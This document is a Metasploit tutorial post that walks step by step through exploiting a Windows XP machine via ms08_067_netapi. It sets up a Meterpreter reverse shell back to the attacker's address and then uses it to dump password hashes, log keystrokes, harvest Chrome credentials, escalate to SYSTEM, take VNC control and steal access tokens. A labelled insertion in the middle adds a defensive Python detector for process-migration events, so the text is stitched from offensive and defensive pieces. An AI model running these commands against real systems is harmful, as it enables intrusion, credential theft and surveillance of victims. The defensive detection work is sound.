9/11/2013

Metasploit 4


Meterpreter part 1

What is Meterpreter?

Meterpreter is a payload that uses in-memory DLL injection, so antivirus software can't detect it, because Meterpreter writes nothing to disk.
Meterpreter uses encrypted communications.

Now let's try to hack a Windows machine (Windows XP) with Meterpreter set as the payload.


First we will use the ms08_067_netapi exploit
use exploit/windows/smb/ms08_067_netapi


Then we set the remote host (the victim)
set RHOST 192.168.0.227

Then we set Meterpreter as the payload
set PAYLOAD windows/meterpreter/reverse_tcp


Then we set the IP address of the local machine (the attacker) so that Meterpreter can connect back to it

set LHOST 192.168.0.229


Then ...

exploit



Excellent

The exploit (ms08_067_netapi) succeeded and the remote machine (victim) connected back to the local machine (attacker).
Now we have a Meterpreter session open.

Let's explore some basic Meterpreter commands:

1- sysinfo
Collects information about the system



2- screenshot
Captures the current desktop


3- hashdump
Dumps the password hashes



Note: Meterpreter contains many scripts, such as vnc, winenum, chrome_enum, killav, ...
To run a script, type run script_name, for example run chrome_enum to capture Chrome credentials.
To list all Meterpreter scripts, just type run and hit Tab twice.


4- keystrokes
A keystroke logger is keyboard-capturing software: it records the keys struck on a keyboard.


A- Migrate to explorer
First we use the ps command to view all processes on the remote machine and get the PID of the explorer process (explorer PID = 1432).
Then we do the migration.
What is migrate?
It moves the Meterpreter session from one process to another, to avoid losing the session if the original process is killed.

migrate 1432
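What migration looks like from the defender's side, as an added example that is not part of the original post: a Python check over constructed Sysmon-style CreateRemoteThread (Event ID 8) records. It assumes Sysmon's field names (SourceImage, TargetImage, StartModule) and that migration surfaces as a remote thread created in the target process whose start address is not backed by any loaded module; the allow-list and sample events are placeholders built for this example.

```python
import ntpath
from dataclasses import dataclass, field
from typing import Optional

# Long-lived, user-owned processes that a session is commonly migrated into.
MIGRATION_TARGETS = {"explorer.exe", "svchost.exe", "winlogon.exe", "lsass.exe"}
# Constructed allow-list placeholder: sources that create remote threads
# legitimately on your baseline (populate from your own environment).
BENIGN_SOURCES = {r"c:\windows\system32\csrss.exe"}


@dataclass
class Alert:
    source_pid: int
    target_pid: int
    target: str
    reasons: list = field(default_factory=list)


def inspect_remote_thread(ev: dict) -> Optional[Alert]:
    """Return an Alert for a Sysmon-style CreateRemoteThread (ID 8) record
    that looks like process migration, else None."""
    if ev.get("EventID") != 8:
        return None
    if ev["SourceImage"].lower() in BENIGN_SOURCES:
        return None
    target = ntpath.basename(ev["TargetImage"]).lower()
    reasons = []
    if target in MIGRATION_TARGETS:
        reasons.append(f"remote thread created in {target}")
    # A start address that no loaded module backs means the thread entry
    # points at injected memory rather than at a DLL on disk.
    if not ev.get("StartModule"):
        reasons.append("thread start address not backed by a module")
    if not reasons:
        return None
    return Alert(ev["SourceProcessId"], ev["TargetProcessId"], target, reasons)


def scan(events):
    """Run every record through the check and keep the alerts."""
    return [a for a in (inspect_remote_thread(e) for e in events) if a]


# Constructed sample events; PIDs mirror the walkthrough (explorer = 1432).
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceProcessId": 1044, "SourceImage": r"C:\WINDOWS\system32\svchost.exe",
     "TargetProcessId": 1432, "TargetImage": r"C:\WINDOWS\explorer.exe",
     "StartAddress": "0x00A30000", "StartModule": "", "StartFunction": ""},
    {"EventID": 8, "SourceProcessId": 596, "SourceImage": r"C:\WINDOWS\system32\csrss.exe",
     "TargetProcessId": 1432, "TargetImage": r"C:\WINDOWS\explorer.exe",
     "StartAddress": "0x7C810000", "StartModule": r"C:\WINDOWS\system32\kernel32.dll", "StartFunction": "LoadLibraryA"},
    {"EventID": 1, "ProcessId": 1528, "Image": r"C:\WINDOWS\system32\wuauclt.exe"},
    {"EventID": 8, "SourceProcessId": 2000, "SourceImage": r"C:\Program Files\Tool\tool.exe",
     "TargetProcessId": 2100, "TargetImage": r"C:\WINDOWS\notepad.exe",
     "StartAddress": "0x7C810000", "StartModule": r"C:\WINDOWS\system32\ntdll.dll", "StartFunction": "RtlUserThreadStart"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Only the first record fires, with both reasons; the csrss.exe record is allow-listed and the notepad.exe thread starts inside a legitimate module.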


B- run keylog_recorder


Note: the output file is located in "/root/.msf4/logs/scripts/keylogrecorder/192.168.0.227_20130820.5859.txt"

Now on Windows, try typing on the keyboard:
ping 192.168.0.229 then CTRL+C


C- To interrupt the keylogger, hit CTRL+C

Now let's view the dumped file
cat /root/.msf4/logs/scripts/keylogrecorder/192.168.0.227_20130820.5859.txt


As expected

5- Privilege Escalation

To get SYSTEM (the admin account with full access and full privileges)

A- Load the priv extension
use priv

B- To get SYSTEM
getsystem

C- To verify the privilege
getuid


6- VNC

VNC (Virtual Network Computing) is remote desktop control software

To install VNC on the remote machine
run vnc




To unlock the remote screen
run screen_unlock


7- Token impersonation

Impersonating user tokens lets you access the system or network without having to provide credentials.

There are two types of tokens:
1- delegate: for interactive logons, such as remote desktop and logging on to the machine
2- impersonate: for non-interactive logons, such as a domain logon

To do so you have to load the incognito extension

use incognito

Then, to list the available tokens
list_tokens -u



To get the SYSTEM token
impersonate_token "NT AUTHORITY\\SYSTEM"



Now we are running as SYSTEM (full access)


OR

Use the ps command to list all running processes; then you can steal the token of the owner of any process

A- ps



Now, if I want to run as Administrator (the owner of the wuauclt.exe process, PID = 1528), or indeed any other process owned by Administrator:

B- steal_token 1528